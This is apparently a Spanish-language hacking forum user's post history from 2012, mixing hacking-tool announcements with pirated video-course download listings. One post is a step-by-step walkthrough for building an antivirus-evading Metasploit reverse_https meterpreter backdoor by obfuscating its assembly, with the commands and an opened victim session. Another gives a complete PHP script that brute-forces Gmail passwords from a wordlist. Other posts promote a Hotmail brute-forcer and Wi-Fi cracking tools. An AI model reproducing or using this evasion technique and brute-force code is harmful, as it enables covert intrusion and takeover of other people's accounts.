Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Aryenal.Bt

#41
Hacking / Metagoofil GUI
Noviembre 14, 2012, 12:28:45 AM

Esta en una I. Grafica de Mettagoofil. les explico:
Metagoofil es una herramienta de recolección de información diseñada para la extracción de metadatos de documentos públicos (pdf, doc, xls, ppt, docx, pptx, xlsx) pertenecientes a una empresa objetivo.

Metagoofil realizará una búsqueda en Google para identificar y descargar los documentos en el disco local y luego extraer los metadatos de bibliotecas diferentes, como Hachoir, PdfMiner? y otros. Con los resultados se generará un informe con los nombres de usuario, versiones de software y servidores o nombres de máquinas que ayuda a los probadores de penetración en la fase de recopilación de información.

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#42
Seguridad Wireless / hashcat
Noviembre 12, 2012, 03:22:45 PM
Caracteristicas:

-Supports all platforms used by hashcat (CPU, OpenCL, CUDA)
-Free
-Multi-OS (Linux & Windows native binaries)
-Multi-Platform (32-bit & 64-bit)

Rendimiento:


hashcat-gui


oclHashcat-plus

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Video: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Manual: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

IMPORTANTE
Conversor online de archivos .cap a .hccap
Convierte el archivo de captura .cap en un .hccap que puede ser leido por hashcat para GPU Cracking
Necesitas el .hccap para crackear con hashcat !!


Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#43
Normalmente crear un backdoor con Metasploit es sinónimo de detección por parte de la mayoría de AV, incluso utilizando el encoder polimórfico shikata_ga_nai.

El siguiente método que vamos a ver en esta entrada se denomina Assembly Ghost writing y consiste en modificar un binario malicioso reescribiendo el código ensamblador del payload del exploit generado con Metasploit.

El resultado es un fichero FUD (completamente indetectable), o al menos con un ratio bajo de detección, por medio del cual un atacante podría obtener una sesión en la máquina de la víctima de forma silenciosa.

En nuestras pruebas utilizaremos BT5R3 con metasploit v4.5.0-dev (atacante) y Win7 con AV McAfee (víctima). El procedimiento es muy sencillo:

1º Creamos el ejecutable malicioso en formato con msfpayload.

Código: php
root@bt:/home/pruebas# msfpayload windows/meterpreter/reverse_https LHOST=192.168.249.128 LPORT=443 R > binario.raw
root@bt:/home/pruebas# file binario.raw
binario.raw: data


2º Preparamos metasm (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Código: php
root@bt:/home/pruebas# cd /opt/metasploit/msf3/lib/metasm
root@bt:/opt/metasploit/msf3/lib/metasm# cp -a metasm.rb metasm /usr/lib/ruby/1.9.2


3º Desensamblamos el fichero binario:

root@bt:/home/pruebas# ruby /opt/metasploit/msf3/lib/metasm/samples/disassemble.rb raw_binary > codigo.asm

4º Ofuscamos manualmente el código, desde esto:

Código: php
// Xrefs: 8dh
loc_15h:
    mov esi, [edx+28h]                           ; @15h  8b7228  r4:unknown
    movzx ecx, word ptr [edx+26h]                ; @18h  0fb74a26  r2:unknown
    xor edi, edi                                 ; @1ch  31ff


a esto:

Código: php
// Xrefs: 8dh
loc_15h:
    mov esi, [edx+28h]                ; @15h  8b7228  r4:unknown
    movzx ecx, word ptr [edx+26h]        ; @18h  0fb74a26  r2:unknown
    mov edi, ecx                ; Move the contents of the ECX register into the EDI Register
    push edi                    ; Push the EDI register onto the current stack frame
    pop edi                    ; Pop it back off
    mov edi, ecx                ; Mov ECX back into edi
    xor ecx, ecx                ; Zero out the contents of the ECX register
    mov ecx, edi                ; Mov EDI back into ECX
    xor edi, edi                ; @1ch


y añadimos al principio del fichero:

Código: php
.section '.text' rwx
.entrypoint


5º Construimos el ejecutable y lo empaqueamos a un formato que Windows pueda ejecutar:

Código: php
root@bt:/home/pruebas# ruby /opt/metasploit/msf3/lib/metasm/samples/peencode.rb codigo.asm -o carga.exe
saved to file "carga.exe"
root@bt:/home/pruebas# file carga.exe
carga.exe: MS-DOS executable, MZ for MS-DOS


6º Lanzamos la consola de Metasploit con el multi/handler:

Código: php
root@bt:/home/pruebas# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_https LHOST=192.168.249.128 LPORT=443 E
[*] Please wait while we load the module tree...

_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[-] The value specified for PAYLOAD is not valid.
LHOST => 192.168.249.128
LPORT => 443
[*] Started reverse handler on 192.168.249.128:443
[*] Starting the payload handler...


7º Y finalmente ejecutamos carga.exe en el equipo Windows:

Código: php
[*] Sending stage (752128 bytes) to 192.168.249.1
[*] Meterpreter session 1 opened (192.168.249.128:443 -> 192.168.249.1:54402) at 2012-11-08 10:44:00 -0500
meterpreter > getuid
Server username: PANDORA\vmotos
meterpreter >


Fuente: hackplayers
#44
Seguridad Wireless / Grimwepa
Noviembre 02, 2012, 12:18:23 PM

GRIM WEPA es una galleta de la contraseña de WEP y WPA-cifrados puntos de acceso (routers). Este programa utiliza las siguientes aplicaciones y suites:

- aircrack-ng suite:
- aircrack-ng, para romper WPA y WEP;
- airodump-ng para capturar los paquetes y encontrar puntos de acceso;
- airmon-ng, para enumerar los dispositivos en modo monitor;
- aireplay-ng, para forjar y reproducir paquetes; y packetforge-ng, para crear paquetes de repetición.
- iwconfig, para ver si los dispositivos están en modo monitor; xterm, para mostrar la salida al usuario;
- ifconfig, para obtener la dirección MAC de los dispositivos;
- macchanger, para cambiar la dirección MAC de las tarjetas wifi.

Estas aplicaciones son necesarias para GRIM WEPA para funcionar correctamente. Todas estas aplicaciones vienen de serie con BackTrack4.
Nota: la configuración y archivos de configuración para Wepa Grim se guarda en / etc / grimwepa.conf


Pag: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#45

Descripcion:

Las últimas soluciones de seguridad inalámbrica

Proteja sus sistemas inalámbricos de ataques paralizantes utilizando la seguridad de la información detallada en este volumen integral. Completamente actualizado para cubrir de hoy consagrados y emergentes tecnologías inalámbricas, Wireless Hacking Exposed, segunda edición revela cómo los atacantes utilizan herramientas disponibles y personalizados para atacar, infiltrarse, secuestrar y los sistemas vulnerables. Este libro analiza los últimos avances en Wi-Fi, Bluetooth, ZigBee y DECT hacking, y explica cómo llevar a cabo pruebas de penetración, reforzar los sistemas de protección WPA, mitigar el riesgo paquete de inyección, y bloquear los dispositivos Bluetooth y RF. Vanguardistas técnicas para la explotación de clientes Wi-Fi, WPA2, teléfonos inalámbricos, el emparejamiento Bluetooth, ZigBee y cifrado también están incluidos en esta guía completamente revisada.

Crear y configurar su red Wi-Fi arsenal ataque con el mejor hardware y herramientas de software
Explora debilidades comunes en redes WPA2 con los ojos de un atacante
Aproveche de compromiso posterior a los ataques de cliente remoto en Windows 7 y Mac OS X
Herramientas de Maestros de ataque para explotar los sistemas inalámbricos, incluyendo Aircrack-ng, coWPAtty, Pyrit, IPPON, FreeRADIUS WPE-, y el KillerBee todos los nuevos
Evalúe su amenaza a la actualización de software de ataques de suplantación en redes públicas
Evalúe su amenaza a los ataques de espionaje sobre Wi-Fi, Bluetooth, ZigBee y DECT redes utilizando herramientas comerciales y personalizados
Desarrollar habilidades avanzadas de aprovechamiento de radio definida por software y otros marcos flexibles
Aplicar las defensas integrales para proteger sus dispositivos inalámbricos e infraestructura

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta?
Pagina: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#46
Hacking / nBrute Force v1.4.1 [Hotmail BruteForce]
Octubre 14, 2012, 02:14:29 PM
nBrute Force: Es una aplicación que testea contraseñas a una gran cantidad de correos electrónicos de Hotmail.

personalmente lo he testeado y puedo decir que no es una aplicacion de fuerza bruta para hotmail, ya que hotmail te bloquea la cuenta temporalmente al intentar colocar mas de 05 veces un password. es muy buena cuando se trata de testar algunas cotraseñas por lo menos 05 ya que esa es la cantidad maxima con la cual podemos jugar, para miles de correos.

aqui les dejo una captura de pantalla. la cual estoy corriendo la aplicacion y paralelamente aperturo el CMD con el comando netstat -b


Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pass: T-N-T
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos.
#47
Back-end / Gmail Brute Force v1.0 - Sec-w.com
Octubre 09, 2012, 11:44:24 PM
Últimamente estoy interesado en el tema de Fuerza Bruta a Correos Electrónicos,  el primero de mi lista es Gmail, así que he probado
algunas aplicaciones que realizan fuerza bruta como: Hydra, Brutus, Bruter entre otros.

Se sabe que Gmail solo te da 5 o 7 intentos para colocar tu passord, luego de eso te pide comprobaciones a través de códigos. así que de que
valdría hacer un ataque de Fuerza Bruta con un diccionario de 5 a 7 palabras por día (seria algo desesperante), pero aun no es el fin.
asi que para ese problema se podria utilizar cURL No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con la cual los intentos de 5 a 7 para probar un posible password desaparecen.

Gmail Brute Force V1.0, Creada por s3n4t00r de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hace posible esto:



lo he testeado y va bien, pero como ya saben no todo es fácil, los correos de Gmail que están protegidos por la famosa seguridad de
2 o 3 pasos (no recuerdo bien XD) <la cual es o consiste en enviarte o llamarte y facilitarte un código de (06) dígitos al un numero de
celular para confirmar el acceso de la persona legitima>; No son blancos para esta aplicación.

asi que sin mas preambulos les dejo el codigo:

Código: php
<?php

/*

   author..............: s3n4t00r
   home................: sec-w.com
   Toolname............: Gmail Brute Force v1.0
   Demonstration ......: http://youtu.be/QdEvoJdENBY



*/
set_time_limit(0);

print_r ("

#---------------------------------------->
# ToolName      : Gmail Brute Force v1.0
#
# Programmed    : s3n4t00r
#
# Home          : Sec-w.com
#---------------------------------------->
\n\n");


if ($argc < 3)
{
            print "\nUsage......: php $argv[0] <mail> <list pass>\n";
            print "\nExample....: php $argv[0] [email protected] pass.txt \n";
            die();
}


function sws_gmail($mail,$pass){

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://mail.google.com/mail/feed/atom');
curl_setopt($ch, CURLOPT_USERPWD, $mail.':'.$pass);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 4);
$result = curl_exec($ch);
$returnCode = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE);

return $returnCode;
}

list($mail, $list,) = array($argv[1], $argv[2]);

$lists = file($list);

foreach ($lists as $pass){

         $gmail = sws_gmail($mail,trim($pass));
         echo "[+]Testing -> ".$pass."\n";
         if($gmail == '200'){

            echo "[+]Password Cracked -> ".$pass;
            die("\n");
         }
}

die("# Failed");

?>



Creditos: s3n4t00r

Saludos.

PD: si alguno de ustedes sabrían como mejorar el código, especialmente en la parte de rapidez en las comprobaciones
       de los password, seria algo genial.

Atte. Aryenal
#48
Hacking / ParameterFuzz v1.1
Septiembre 18, 2012, 03:48:23 PM
ParameterFuzz es una herramienta destinada a comprobar el nivel de fortificación en aplicaciones web, intenta cubrir el campo más explotado por los hackers, ya que la mayoría de ataques conocidos, se basan en la explotación de parámetros mal filtrados. Así como SQL injection, Cross Site Scripting o RFI entre otros.

La aplicación consta de un Menú principal donde un desplegable nos permite seleccionar el idioma, además de la opción de enviar peticiones GET o POST. Una vez seleccionado el lenguaje, quedará configurado en la aplicación para siguientes usos.


Si presionamos sobre la opción GET, se abrirá un nuevo panel desde donde se lanzarán los ataques. La parte alta del mismo, es el lugar donde se llevarán a cabo las configuraciones de nuestras peticiones, antes de ser enviadas.


La mayor particularidad de ParameterFuzz, se encuentra en la opción de poder ver las respuestas que las páginas atacadas han devuelto en cada petición que enviemos, ya que incorpora un navegador basado en un control Webbrowser, el cual interpreta los resultados ejecutando Javascript como lo haría un navegador real. Las opciones de ataque por diccionario, las encontramos en los apartados "Parametro Fuzz" y "Valor Fuzz", ambas opciones pueden ser habilitadas conjuntamente o por separado.

En caso de desear la modificación de alguno de los campos de parámetros o valores, podremos hacerlo de forma manual sobre las cajas de texto, en caso de los diccionarios, tan solo hay que tener en cuenta las etiquetas definidas en su interior, para que la aplicación funcione correctamente, ya que estas se utilizan para avisar al auditor cuando se trata de un cambio de ataque.


Mientras realizamos el envío de peticiones, la parte baja de ParameterFuzz, nos permite guardar las longitudes de las peticiones anteriores, con el fin de comparar sus longitudes y avisar al auditor de que la página actual ha respondido de manera diferente, con que parámetro y valor. También podremos agregar el nombre del valor inyectado al buscador, que de igual manera avisará al auditor de las coincidencias encontradas. Esto será crucial para búsquedas de vulnerabilidades de XSS o SQLi.


Es recomendable si aún no conocemos del todo la herramienta, presionar el botón "Petición" antes de enviar las peticiones, ya que muestra de forma detallada como se configuró el envío.


Una vez encontrada la vulnerabilidad, podremos echarle un vistazo al código fuente con el buscador, para ver exactamente el punto o puntos donde se produce nuestra inyección.


La opción más cómoda de la aplicación, es sin duda la de hacer clic sobre el CheckBox de "Peticiones Automáticas", ya que si activamos uno de los diccionarios, de forma automática enviarán peticiones en busca de posibles parámetros existentes en la página auditada y almacenará el resultado de la longitud en un archivo de Log. Al terminar el diccionario de parámetros, la aplicación preguntará al auditor si desea ver o no, los resultados.


También tendremos la opción de eliminar el contenido de los Logs o verlos de forma rápida, con los botones del margen inferior derecho de la aplicación.


En el caso de elegir auditar peticiones POST, la aplicación se comporta de forma idéntica, tan solo destacando que el envío de parámetros conocidos va separado en una caja de texto aparte.


A continuación, dejo un listado de cambios desde la versión 1.0 a la actual 1.1 de ParameterFuzz.

Código: php
[+]Agregado un CheckBox para lanzar las peticiones de forma automática, así después comparar resultados en un Log.

[+]Agregado botón "Log", para un acceso más rápido a leer las peticiones automáticas.

[+]Agregado botón "Borrar", para eliminar Logs.

[+]Agregada la opción de selección de idioma Ingles o Español para toda la aplicación.

[+]Agregada una etiqueta para contabilizar el número de caracteres por página HTML (GET y POST).

[+]Agregada la opción de Guardar la longitud de la página, para compararla con la de próximas peticiones.

[+]Agregada la función de búsqueda de palabras en HTML según se escriben.

[+]Agregado ManifestXP a los estilos de la aplicación.

[+]Agregado un botón minimizar en la barra superior.

[+]Deshabilitados los errores en modo debug de Javascript para la navegación.


PD: El archivo ParameterFuzz.exe.manifest, es un XML que proporciona los nuevos estilos a la aplicación, si lo eliminan es posible que la aplicación no funcione.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#49
Saludos Underc0de. aperturo esta entrada en donde se ira colocando cursos con sus respectivos enlaces, elaborados por Video2Brain. si algunos de ustedes desean colocar algún curso de Video2Brain, hágalo pero asegúrese de que el curso no haya sido posteado por otro usuario en el foro y que ademas los cursos estén en español.

Video2Brain: Novedades de OS X 10.8 Mountain Lion (2012) Todo lo nuevo de un vistazo (Español)

Video2Brain: Novedades de OS X 10.8 Mountain Lion (2012)
DVD | ISO | 454 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Carlos Burges | Duración: 01:34 horas
Fecha de publicación: 26-sep-2012

Todo lo nuevo de un vistazo

Si ya tienes experiencia con los sistemas operativos de Apple, sabrás que con cada nueva entrega vas a encontrarte un buen montón de novedades. En este completo curso video2brain te las contamos todas las que incluye OS X 10.8 Mountain Lion.
Carlos Burges te presenta su primer curso video2brain: Novedades de OS X 10.8 Mountain Lion. Todo lo nuevo de un vistazo.

En este curso video2brain conocerás todas las novedades de OS X 10.8 Mountain Lion, especialmente diseñadas para esta versión de su aclamado sistema operativo.

En esta ocasión, Apple ha ido un poco más allá en la integración, añadiendo más servicios orientados tanto al usuario del hogar como al profesional, además de añadir integración con redes sociales, un sistema completo de notificaciones, mejoras en su navegador, un nuevo sistema de mensajería instantánea que ahora se comparte con los dispositivos con iOS, mejoras sustanciales en la protección a través de Gatekeeper, Dictado y muchas otras mejoras a lo largo del sistema operativo.

    Novedades de iCloud
    Mensajes y Twitter
    Recordatorios y notificaciones
    Gatekeeper
    GameCenter
    Notas
    Mail y iCal
    Dashboard y Finder
    Photo Booth
    Safari
    ...

Si todavía no conoces esta versión, descubre en este curso video2brain lo que Apple ha preparado. Si ya tienes esta versión instalada en tus equipos Mac, descubre una a una las novedades visibles y las ocultas y cómo utilizar cada una de ellas.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Arte digital con Photoshop: Ilustración científica de un ojo (2012) Aprende a crear tus propias ilustraciones (Español)

Video2Brain: Arte digital con Photoshop: Ilustración científica de un ojo (2012)
DVD | ISO | 302 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Ángel Trancón | Duración: 01:10 horas
Fecha de publicación: 03-oct-2012

Aprende a crear tus propias ilustraciones

La ilustración científica y médica es un mundo apasionante que puede ofrecer grandes formas de llevar lo espectacular a lo visual y a la educación sin resultar en ilustraciones planas y poco espectaculares. Diseña y desarrolla tu propia ilustración científica. Paso a paso desde cero hasta los toques finales. Aprenderás a crear el modelo y a detallarlo con este curso video2brain. Aumenta la calidad final de la ilustración con detalles que se desmarquen de las ilustraciones científicas convencionales y planas.
José Ángel Trancón te presenta su curso Arte digital con Photoshop: Ilustración científica de un ojo. Aprende a crear tus propias ilustraciones.

Con este curso video2brain lograrás crear paso a paso una ilustración científica con un acabado excelente y diferente a las típicas ilustraciones científicas planas y aburridas. En este ejemplo práctico añadiremos elementos y detalles paso a paso hasta lograr su aspecto final. Podrás seguir el tutorial desde el principio hasta el final, o bien centrarte en los aspectos y trucos que mas útiles te resulten.
Verás cómo desarrollar un corte esquemático de un globo ocular humano. Aprenderás a crear el modelo básico y a iluminarlo para darle un aspecto casi de maqueta real. Aprenderemos a añadirle las capas necesarias para crear el modelo esquemático. Paso a paso crearás volumen con la luz y las sombras, a crear elementos superpuestos en diferentes planos y a hacerlos interactuar los unos con los otros usando las herramientas de Adobe Photoshop.
Algunos conceptos importantes que aplicarás serán: planificar el proyecto por medio de capas, creación del modelo base del globo ocular, creación de las distintas capas en detalle del modelo, detallado de los diferentes elementos, iluminación y creación de volúmenes mediante sombras y brillos, interacción entre los distintos elementos, comprensión del funcionamiento del trabajo mediante capas superpuestas, y como duplicar elementos para una flujo de trabajo cómodo y útil.
Se facilitarán todos los archivos necesarios para el desarrollo del proyecto. Dentro de la carpeta principal, en un archivo de Photoshop por capas. Y en los elementos detallados en formato JPG. Tanto si eres un ilustrador que se introduce por primera vez en el mundo de la ilustración científica, como si aún no has ilustrado nunca, este curso video2brain te contará los secretos de la ilustración con acabados realistas.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Video2Brain: Mi primera web dinámica con Dreamweaver (2012) Crea una web sin necesidad de programar (Español)

Video2Brain: Mi primera web dinámica con Dreamweaver (2012)
DVD | ISO | 511 MB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Jorge González Villanueva | Duración: 02:28 horas
Fecha de publicación: 03-oct-2012


Crea una web sin necesidad de programar

Es muy frecuente que se piense que la creación de sitios web que saquen sus contenidos de bases de datos está limitada a programadores expertos. Nada más lejos de la realidad: Adobe Dreamweaver nos ofrece herramientas que, sin necesidad de programar en lenguajes de servidor, recuperarán datos y generarán el código HTML que los muestre al usuario final, y en este curso video2brain aprenderás precisamente a realizar esta acción.
Jorge González Villanueva te presenta su curso Mi primera web dinámica con Dreamweaver. Crea una web sin necesidad de programar.

Crear un sitio web complejo, cuyos contenidos cambien con el paso del tiempo utilizando solo HTML, es una tarea repetitiva y pesada que nos podemos ahorrar utilizando lenguajes de servidor. Sin embargo, está extendida la idea de que esta manera de trabajar solo es posible para expertos programadores.

Nada más lejos de la realidad y en video2brain vamos a demostrártelo con este curso en el que utilizaremos Adobe Dreamweaver para generar contenidos utilizando PHP y sin necesidad de programar con él. Si tienes ganas de ampliar tu capacidad de generar contenidos web y no posees de conocimientos sobre PHP, este  será tu curso.

Aprenderemos a instalar y configurar todo lo necesario y a utilizar las herramientas de generación de código PHP que nos ofrece Dreamweaver en un ejemplo real. Crearemos una web dinámica en la que podremos mostrar contenidos, y también añadirlos, modificarlos y borrarlos.


Y lo haremos creando la web desde cero, para que cualquiera pueda seguir el curso sin necesidad de ser un programador.






Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Efectos especiales con Blender (2012) Ejemplos con fluido, humo y dinámicas (Español)

Video2Brain: Efectos especiales con Blender (2012)
DVD | ISO | 1.34 GB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Vicente Carratalá | Duración: 02:13 horas
Fecha de publicación: 03-oct-2012

Ejemplos con fluido, humo y dinámicas

Crea espectaculares simulaciones de fluidos, humo y colisiones con Blender. En este curso práctico de video2brain te enseñamos, a través de varios ejemplos, los parámetros que te hacen falta para crear animaciones de efectos especiales que podrás incorporar a tus proyectos.
José Vicente Carratalá te muestra un avance de lo que verás en su nuevo curso Efectos especiales con Blender. Ejemplos con fluido, humo y dinámicas.

En este curso video2brain aprenderás paso a paso a realizar simulaciones de efectos especiales en las que intervengan fluidos, humo o sólidos rígidos. Y todo ello usando las características incorporadas dentro de Blender.

En concreto, se desarrollarán una serie de ejercicios prácticos, a través de los cuales te explicaremos los parámetros y los trucos que necesitas conocer para poner en marcha tus simulaciones de efectos.

Empezaremos viendo las simulaciones con fluidos, en las que aprenderemos a trabajar con contenedores, añadiremos entradas y salidas de fluidos, obstáculos y objetos de control.
continuaremos trabajando con simulaciones de humo, en las que aprenderemos a crear contenedores, emisores de humo y campos de fuerza. Además, aprenderemos a configurar correctamente un material para representar el humo.
finalizaremos creando una espectacular animación de derrumbamiento usando sólidos rígidos.
     

Se facilitarán todos los archivos necesarios para que repitas los ejemplos paso a paso y así seas capaz de aplicar efectos especiales en tus propios proyectos.





Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Adobe Digital Publishing Suite (2012)
DVD | 1.08 GB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: José Ramos | Duración: 05:00 horas
Fecha de publicación: 15-feb-2012

Publicación electrónica para iPads y otras tabletas

Este curso video2brain te demostrará cómo diseñar y crear publicaciones interactivas para tabletas mediante el uso de InDesign CS5/5.5 y Adobe Digital Publishing Suite (DPS). Aprenderás a crear hipervínculos, proyección de diapositivas, videos, audio, secuencia de imágenes y mucho más. Este es uno de los cursos más completos sobre el tema de creación de publicaciones digitales con el Adobe Digital Publishing Suite que encontrarás en cualquier lugar y en cualquier idioma.
José Ramos te presenta su curso video2brain Adobe Digital Publishing Suite.
Este curso video2brain te demostrará cómo diseñar y crear publicaciones interactivas para dispositivos de tabletas mediante el uso de Adobe InDesign CS5/5.5 y el Digital Publishing Suite (DPS). En sus primeros capítulos, José M. Ramos, el autor de este curso y Evangelista Adobe para el DPS, te introducirá a esta nueva plataforma editorial explicando temas como el flujo de trabajo digital comparado al tradicional, instalación de las herramientas, consideraciones al diseñar para este medio y otros.

Al adentrarte en el curso comenzarás a comprender temas de nivel básico, intermedio y avanzado que te permitirán crear hipervínculos, proyección de diapositivas, videos, audio, secuencia de imágenes y mucho más. Además, recibirás los consejos y trucos que el autor ha acumulado en su experiencia con la plataforma y su interacción con los ingenieros que la crearon.

Finalmente, verás el proceso de publicación, distribución, compilación y creación de visor personalizado.

Temas que se incluyen:
Diseño y composición de una revista digital
Creando interactividad mediante hipervínculos
Uso y manejo de un objeto de varios estados
Integración de video en publicaciones digitales
Uso de audio en la revista
Superposiciones de recorrido y zoom
Secuencia de imágenes y creación de panorámicas para añadir una 4ta dimensión a tu revista
Cómo aprovechar al máximo superposiciones de contenido Web
Animación de elementos de página
Compilación y creación de visor personalizado
Además verás cómo integrar las siguientes aplicaciones al flujo de trabajo de publicaciones digitales:




Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Adobe Acrobat Pro X para la oficina (2011), Formularios, revisión y comentarios (Español)
Video2Brain: Adobe Acrobat Pro X para la oficina (2011)
DVD | ISO | 901 MB | Spanish | VIDEO2BRAIN | Vídeo Training | Incl. Archivos Base
Formadores: Ignacio Lirio | Fecha de publicación: 16-feb-2011

Formularios, revisión y comentarios

El software por excelencia para la creación, distribución y manipulación de archivos PDF es Adobe Acrobat X. La gestión documental en la empresa ha trascendido ya al papel, ¿a qué esperas para unirte y trabajar en tu empresa con documentos electrónicos al 100 %?
Cada vez es mayor el flujo de información que empresas y organizaciones de cualquier tamaño deben manejar y el uso tradicional con los medios propios del siglo XX (papel, correo, fax...) es un lastre para operar con eficiencia.  Desde hace ya algún tiempo, muchas grandes empresas y la mayoría de las administraciones públicas generan, guardan y distribuyen toda su documentación de forma electrónica, prescindiendo del papel. Y el formato estándar por excelencia de archivo digital de la información, para todo tipo de documentos, es el PDF. Este tipo de documento está mundialmente reconocido y goza de la garantía del estándar ISO, además de ser un formato no-propietario, es decir, que es público.

Con Acrobat, además es posible que toda la documentación electrónica sea interactiva con los usuarios, en forma de anotaciones gráficas y formularios que se envían y se autogestionan para procesar las respuestas de esos usuarios. Todo con una sola herramienta, Acrobat. Y para una audiencia global: Adobe Reader es el lector gratuito de PDFs que está instalado en la inmensa mayoría de ordenadores del mundo.

Aprende en este curso video2brain a elaborar y distribuir formularios, diseñados en Acrobat o en otros programas. Trabaja de forma colaborativa, haciendo revisiones de documentación digital dentro de un equipo o incluyendo comentarios a tus documentos.

Adobe Acrobat es una herramienta sencilla e intuitiva y será la clave para hacer entrar a tu organización en una nueva dimensión de eficiencia, ahorro y menor impacto medioambiental


El sistema de aprendizaje de video2brain

El objetivo de video2brain es poner a tu disposición cursos eficientes, adaptados a tus necesidades y que se puedan ver tantas veces como desees. Nuestros cursos están disponibles en DVD y online. ¡Aprende de una forma nueva!

video2brain te ofrece cursos especializados e instructivos, siempre a tu disposición y que se pueden repetir tantas veces como lo desees, en casa, en el tren, solo o en grupo. En la creación de los vídeos le concedemos una gran importancia al aspecto práctico, a que la estructura didáctica sea lo más clara posible y a la inclusión de prácticos trucos.

Estamos convencidos de que la calidad de nuestros productos convertirá tu aprendizaje en un proceso rápido y satisfactorio y por ello, video2brain trabaja constantemente en la creación de nuevos productos para ayudarte a alcanzar tus metas.




Descarga:
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: descargasnsn

1ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2da opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3ra opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
4ta opción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Video2Brain: Esto es Adobe Flex (2010) Creación de tienda online (Español)
Video2Brain: Esto es Adobe Flex (2010)
DVD | ISO | 1.99 GB | Spanish | VIDEO2BRAIN | Incl. Archivos Base | Vídeo Training
Formadores: Jorge González Villanueva | Duración: XX:00 horas
Fecha de publicación: 05-feb-2010

Creación de tienda online

¿Quieres saber a qué problemas se enfrenta de verdad un programador a la hora de aplicar un diseño de un proyecto en Flex? ¿Quieres ver de verdad cómo trabaja un desarrollador profesional y cómo soluciona los problemas? ¡Este es tu curso!
Pocas veces se tiene ocasión de encontrar un curso en el que se enseñe a manejar en proyectos reales un programa, y menos uno como Flex. Los cursos básicos están bien, pero una ayuda real sobre cómo crear aplicaciones avanzadas puede tener un valor inestimable como referencia a la hora de desarrollar.

El planteamiento de este curso online es ser lo más fieles a la realidad. A partir de un diseño creado para el curso online de video2brain "Diseño de tienda online con Adobe Photoshop" de Luz de León, hemos montado una tienda.

